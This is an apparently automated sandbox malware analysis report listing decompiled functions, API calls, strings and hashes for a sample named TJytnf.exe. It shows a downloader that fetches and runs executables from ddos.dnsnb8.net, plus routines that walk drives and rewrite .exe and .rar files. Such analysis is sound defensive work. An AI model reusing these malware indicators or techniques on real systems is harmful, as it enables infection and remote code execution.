Opcode Fuzzy Hash: 1d74de621471113eeeb8add9240d3a41931af28086330595ed0f5070e02ead39
Instruction Fuzzy Hash:

Function 0044B180 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HLSERVER*, xrefs: 0044B33B

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: HLSERVER*
API String ID: 0-957054744
Opcode ID: fd45598dca43effb716ce62f909105a5dfc324d518f9801d4848c510911b8a64
Instruction ID: 68eca3d0c2f42d524363f67ecf98b10ab73a3c77c18b9f59a22a3ad83c37190b
Opcode Fuzzy Hash: fd45598dca43effb716ce62f909105a5dfc324d518f9801d4848c510911b8a64
Instruction Fuzzy Hash: 86B1C071944301ABE720DF24DC42B6B77E4FB84708F00592EF98597282E7B9D949CBDA

Function 00447880 Relevance: 6.3, APIs: 4, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701717f76f5fe287e7d309bb2a5ec2d4c4f1fcacca32e3f437aabca2e8024746
Instruction ID: db78036c0407077dc33b3c98e79fd2754e219730d596cdf3bd1da380166198d1
Opcode Fuzzy Hash: 701717f76f5fe287e7d309bb2a5ec2d4c4f1fcacca32e3f437aabca2e8024746
Instruction Fuzzy Hash: 9C912476B412045FFB24BB18FC86BEA7391E781B36F94113BDE0481290D77F914E86A6

Function 0044A2E0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HLSERVER*, xrefs: 0044A471

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: HLSERVER*
API String ID: 0-957054744
Opcode ID: 09aabef86f9e71416445cf1ff0a91cc696f79f3c95a9a1e4baad9ba26417a56a
Instruction ID: 414a6989aa7181aa4c89ac1ab9b235a0e7efefaa3f73ce74a9a2122661ee6fb3
Opcode Fuzzy Hash: 09aabef86f9e71416445cf1ff0a91cc696f79f3c95a9a1e4baad9ba26417a56a
Instruction Fuzzy Hash: 4DC1C171984301ABF720DF20DD41B6BB3E4BB84708F14482EF9899B281E779D955CB9B

Function 00446D40 Relevance: 5.2, APIs: 4, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5c7168302d51b7f4118bd3c1982a2a15ed99ddf1b8f239ed663b8aee24682b
Instruction ID: 6ef43b866e82f3513f8c0b0e81522870bcf4ae598b1323f2f16c687a8000aed2
Opcode Fuzzy Hash: 8b5c7168302d51b7f4118bd3c1982a2a15ed99ddf1b8f239ed663b8aee24682b
Instruction Fuzzy Hash: CD51E5B16403016BF720AF50EC45BAB73A4EF81715F40042EFA45962C1EBBDD9198B9A

Analysis Process: TJytnf.exePID: 3044, Parent PID: 7128COMMON

Execution Graph

Execution Coverage:	31.9%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	18.9%
Total number of Nodes:	297
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00F729E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00F72A02
wsprintfA.USER32 ref: 00F72A1A
memset.MSVCRT ref: 00F72A44
lstrlen.KERNEL32(?), ref: 00F72A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00F72A6C
strrchr.MSVCRT ref: 00F72A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00F72A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00F72AAE
memset.MSVCRT ref: 00F72AC6
memset.MSVCRT ref: 00F72ADA
FindFirstFileA.KERNEL32(?,?), ref: 00F72AEF
memset.MSVCRT ref: 00F72B13
lstrcmpiA.KERNEL32(?,?), ref: 00F72B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00F72B67
FindClose.KERNEL32(00000000), ref: 00F72B6E

Strings

C:\, xrefs: 00F72A2F
Documents and Settings, xrefs: 00F72A8D, 00F72A92, 00F72A9A, 00F72AAD
%s*, xrefs: 00F72A14

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 732de9b38b6035bf5a649788f7dbf92902332f7b3a4165f93e0ca9d4f2a66011
Instruction ID: 7ad9a520f6249b89c9635afdd885b049970a922b1004d803529b5168baaf5b93
Opcode Fuzzy Hash: 732de9b38b6035bf5a649788f7dbf92902332f7b3a4165f93e0ca9d4f2a66011
Instruction Fuzzy Hash: E44173B2804349BFD761DBA0DC49DEB77ACEB84315F04482BF94CC2111E634D658ABA3

Function 00F71099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F7185B: GetSystemTimeAsFileTime.KERNEL32(00F71F92,00000000,?,00000000,?,?,?,00F71F92,?,00000000,00000002), ref: 00F71867
Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71878
Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71880
Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71890
Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71894

WinExec.KERNEL32(?,00000005), ref: 00F710F1
lstrlen.KERNEL32(00F74748), ref: 00F710FA
wsprintfA.USER32 ref: 00F7112A
wsprintfA.USER32 ref: 00F71143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00F7115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00F71169
Sleep.KERNEL32 ref: 00F71179

Strings

ddos.dnsnb8.net, xrefs: 00F710C8, 00F710CF, 00F71140, 00F71168
%s%.8X.exe, xrefs: 00F71124
http://%s:%d/%s/%s, xrefs: 00F710C2, 00F71141
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00F71119
cj/, xrefs: 00F71135

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user~1\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-4120842960
Opcode ID: ceb98667e9c695ac20f3d4c9f27e13d14bc69a2eb33f38a5da4ca8f554b7b5f7
Instruction ID: b68d37de45b428cf15a5e9b6be228534d60cc7a76a9c8ae45c63329fdd69f2d9
Opcode Fuzzy Hash: ceb98667e9c695ac20f3d4c9f27e13d14bc69a2eb33f38a5da4ca8f554b7b5f7
Instruction Fuzzy Hash: 3D214175D0024CBADB119BA4DC45BAFBB7CBB05315F518056E608A2051D774AB88FF53

Function 00F76076 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 614
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00F760BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00F760DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00F76189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00F761A5

Strings

kernel32.dll, xrefs: 00F764A7

Memory Dump Source

Source File: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: kernel32.dll
API String ID: 2087232378-1793498882
Opcode ID: 7b17037aae3aec55d74ed426653549d2269d8f0aa5bcea2a27523279dd2bc4ee
Instruction ID: 663e94ec5c169b05c3d674f65cb3975aab0aa1f94850eeba8082b9895b43c7d7
Opcode Fuzzy Hash: 7b17037aae3aec55d74ed426653549d2269d8f0aa5bcea2a27523279dd2bc4ee
Instruction Fuzzy Hash: 68122672908B859FDB328F64CC45BEA3BB0EF06310F18855ED88DCB693D674A901E756

Function 00F71718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F71729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00F7174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00F7177C
__aulldiv.LIBCMT ref: 00F71796
__aulldiv.LIBCMT ref: 00F717A8

Strings

C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F71722
Time, xrefs: 00F7173D, 00F71766
SOFTWARE\GTplus, xrefs: 00F71742, 00F7176B

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-2654363020
Opcode ID: 49354ff6e2f3b3dfe51e1574d65d7cac5c89e24330acebe67d87056aed850aa2
Instruction ID: da6f73a4561c405a92c058200136f68b26e95123b693fc212bd3cd3548dba521
Opcode Fuzzy Hash: 49354ff6e2f3b3dfe51e1574d65d7cac5c89e24330acebe67d87056aed850aa2
Instruction Fuzzy Hash: CB116372E00209BBDB149E94CC85FEF7BBCEB44B14F10C516F908A6141D6B5DA49FB62

Function 00F72B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00F72BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00F72BB4
GetDriveTypeA.KERNEL32(?), ref: 00F72BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00F72BEE
lstrlen.KERNEL32(?), ref: 00F72BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00F72C16
CreateThread.KERNEL32(00000000,00000000,00F72845,00000000,00000000,00000000), ref: 00F72C3A

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: dd4afcf7a72186867942d5677d47b85b7456d969a2bb08ca0051b2b5aa7caa95
Instruction ID: f5005bbcb24d08614f019cbe9d395c22c2677178504950669108e7f0849a4c56
Opcode Fuzzy Hash: dd4afcf7a72186867942d5677d47b85b7456d969a2bb08ca0051b2b5aa7caa95
Instruction Fuzzy Hash: DB2127B180014CBFE7209F689C84DAE7B6CFB44368B10412BF84A92151D7309E86FB63

Function 00F71E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00F732B0,00000164,00F72986,?), ref: 00F71EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00F71ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00F71EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00F71F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00F71F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00F7201E
memset.MSVCRT ref: 00F720D8
memset.MSVCRT ref: 00F720EA
memcpy.MSVCRT ref: 00F7222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F72238
FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F7224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F722C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F722CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F722DD
WriteFile.KERNEL32(000000FF,00F74008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F722F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F7230D
FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F72322
UnmapViewOfFile.KERNEL32(?,?,00F732B0,00000164,00F72986,?), ref: 00F72340
FindCloseChangeNotification.KERNEL32(?,?,00F732B0,00000164,00F72986,?), ref: 00F7234E
CloseHandle.KERNEL32(000000FF,?,00F732B0,00000164,00F72986,?), ref: 00F72359

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
String ID:
API String ID: 307705342-0
Opcode ID: 699157522cefe6cb34c62771ad83436827ba280f84e1eff385b1c2d908042336
Instruction ID: ef4e0fb5b6c57fee6543d0baa352431aa024770581a4ab9a28f782d4f72ace1b
Opcode Fuzzy Hash: 699157522cefe6cb34c62771ad83436827ba280f84e1eff385b1c2d908042336
Instruction Fuzzy Hash: 3FF17D71900208EFDB61DFA8DC81AADBBB5FF08314F10852AE50DA7661D734AD91EF52

Function 00F71973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00F74E5C,00000000,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F71992
CreateFileA.KERNEL32(00F74E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00F719BA
Sleep.KERNEL32(00000064), ref: 00F719C6
wsprintfA.USER32 ref: 00F719EC
CopyFileA.KERNEL32(00F74E5C,?,00000000), ref: 00F71A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F71A1E
GetFileSize.KERNEL32(00F74E5C,00000000), ref: 00F71A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00F71A46
ReadFile.KERNEL32(00F74E5C,00F74E60,00000000,?,00000000), ref: 00F71A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00F71A90
DeleteFileA.KERNEL32(?), ref: 00F71AA7
VirtualFree.KERNEL32(00F74E60,00000000,00008000), ref: 00F71AC1

Strings

C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F7197C
2, xrefs: 00F719CF
%s%.8X.data, xrefs: 00F719E6
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00F719DB

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
API String ID: 2523042076-290089164
Opcode ID: 08c44949e2870a90b197ace8ef1a9bc9a595dff1d023d119c48b302968db4864
Instruction ID: 6fa200c9742af5149b86c19691adcf988478a2daa9309788556ac667015259ca
Opcode Fuzzy Hash: 08c44949e2870a90b197ace8ef1a9bc9a595dff1d023d119c48b302968db4864
Instruction Fuzzy Hash: 1A517171D01219FFDF109F98CC84AAEBBB9FB04364F10856AF519E2190D3749E98EB52

Function 00F728B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00F728D3
wsprintfA.USER32 ref: 00F728F7
memset.MSVCRT ref: 00F72925
wsprintfA.USER32 ref: 00F72940

Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72A02
Part of subcall function 00F729E2: wsprintfA.USER32 ref: 00F72A1A
Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72A44
Part of subcall function 00F729E2: lstrlen.KERNEL32(?), ref: 00F72A54
Part of subcall function 00F729E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00F72A6C
Part of subcall function 00F729E2: strrchr.MSVCRT ref: 00F72A7C
Part of subcall function 00F729E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00F72A9F
Part of subcall function 00F729E2: lstrlen.KERNEL32(Documents and Settings), ref: 00F72AAE
Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72AC6
Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72ADA
Part of subcall function 00F729E2: FindFirstFileA.KERNEL32(?,?), ref: 00F72AEF
Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72B13

strrchr.MSVCRT ref: 00F72959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00F72974

Strings

rar, xrefs: 00F72988
exe, xrefs: 00F7296D
%s\, xrefs: 00F7293A
%s%s, xrefs: 00F728F1
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00F729B3

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user~1\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-4092107658
Opcode ID: 6a3e20e094d67163ca6bb1d31a990978b9de11f2acb8afb1633d9dee2e4a093d
Instruction ID: 88d590f8a4c234e545cf81f89e9ac38907ce34b9252cd2497b6c3c8947799ac6
Opcode Fuzzy Hash: 6a3e20e094d67163ca6bb1d31a990978b9de11f2acb8afb1633d9dee2e4a093d
Instruction Fuzzy Hash: 2E31867294031D77DB609764DC85FDA777C9B14324F088463F68DA2081DAB4DAC4BA63

Function 00F71638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\,?,00000005,00000000), ref: 00F7164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00F7165B
GetModuleFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,00000104), ref: 00F7166E
